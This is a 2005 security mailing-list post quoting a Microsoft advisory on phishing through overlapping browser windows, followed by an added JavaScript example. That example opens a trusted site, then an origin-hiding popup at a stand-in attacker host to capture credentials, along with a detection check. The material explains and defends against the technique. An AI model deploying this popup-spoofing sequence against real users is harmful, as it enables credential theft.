[Dshield] Microsoft Security Advisory Notification (902333)

Al Reust areust at comcast.net
Wed Jun 22 04:15:19 GMT 2005


What makes this notable is that I have received several trapped Credit Union 
"Phishing" attempts. I apologize that I cannot provide more details 
(examples), other than that they are aimed primarily at Federal and State employees 
and their Credit Unions (including EDUs). This could also provide 
information to target the account and personal information of those specific 
users. The larger threat is that "users" tend to use the same 
password wherever they can. Examination of several attempts shows that 
multiple windows were launched to mask what the user would see. The 
attempts were trapped by the email gateway and examined; some of the first 
few attempts "do not" always follow proper mail rules.

Yes, this advisory is long overdue, and it is browser-independent.

Browser Windows Without Indications of Their Origins may be Used in 
Phishing Attempts
Published: June 21, 2005

Microsoft has investigated a public report of a phishing method that 
affects Web browsers in general, including Internet Explorer.
The report describes the scenario of multiple, overlapping browser windows, 
some of which contain no indications of their origin. An attacker could 
arrange windows in such a way as to trick users into thinking that an 
unidentified dialog or pop-up window is trustworthy when it is in fact 
fraudulent. When a user visits a malicious Web site, the user may be 
redirected to a trusted Web site. The attacker could then display an 
overlapping window in the form of a dialog box attempting a phishing 
attack. The user is then prompted to input personal information into this 
dialog box, which was opened from the malicious Web site. The user might 
believe that this dialog box was opened by the trusted Web site and they 
might input personal information. However, this information is sent to the 
malicious Web site.

http://www.microsoft.com/technet/security/advisory/902333.mspx

This affects "most" web browsers.

R/

Al
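The window sequence the advisory describes, as an added example that is not part of the original post or of the Microsoft advisory: the attacker's page first opens the trusted site in a normal window (address bar visible, showing the trusted origin), then opens its own page on top of it with every chrome element that would reveal the origin switched off, sized and positioned like a login dialog. The `window` object is passed in so the sequence can be exercised outside a browser; the URLs and the hidesOrigin check are assumptions for illustration.

```javascript
// Added example (not from the DShield post or the Microsoft advisory):
// the overlapping-window phishing sequence, modelled against a window-like
// object so it runs under Node. URLs and names below are assumptions.

const TRUSTED_URL = "https://bank.example/";          // hypothetical trusted site
const DECOY_URL = "https://attacker.example/login";   // hypothetical attacker page

// Feature string that suppresses every chrome element that would reveal the
// decoy's origin in a 2005-era browser: no location bar, no status bar, no menus.
function decoyFeatures(width, height, left, top) {
  return [
    "location=no", "toolbar=no", "menubar=no", "status=no", "resizable=no",
    `width=${width}`, `height=${height}`, `left=${left}`, `top=${top}`,
  ].join(",");
}

// Step 1: send the victim to the trusted site in a full window.
// Step 2: open the decoy on top of it, centred and dialog-sized, origin hidden.
// Anything typed into the decoy goes to DECOY_URL, not to the trusted site.
function launchOverlap(win) {
  const trusted = win.open(TRUSTED_URL, "_blank");
  const w = 400, h = 260;
  const left = Math.floor((win.screen.width - w) / 2);
  const top = Math.floor((win.screen.height - h) / 2);
  const decoy = win.open(DECOY_URL, "decoy", decoyFeatures(w, h, left, top));
  return { trusted, decoy };
}

// The tell a reviewer or an automated checker can look for: a popup whose
// feature string turns the location bar off. Current browsers ignore
// location=no in popups for exactly this reason, which is the real mitigation.
function hidesOrigin(features) {
  return /(^|,)\s*location\s*=\s*(no|0)\s*(,|$)/i.test(features);
}

// Minimal stand-in for `window` (constructed here) that records open() calls.
function fakeWindow() {
  const calls = [];
  return {
    screen: { width: 1280, height: 800 },
    calls,
    open(url, name, features) {
      calls.push({ url, name, features: features || "" });
      return { url };
    },
  };
}

if (typeof require !== "undefined" && require.main === module) {
  const w = fakeWindow();
  launchOverlap(w);
  for (const c of w.calls) {
    console.log(c.url, hidesOrigin(c.features) ? "(origin hidden)" : "(origin shown)");
  }
}
```

The user-side check is the same one the advisory implies: a window that asks for credentials but shows no address bar has not proven where it came from, whatever sits behind it.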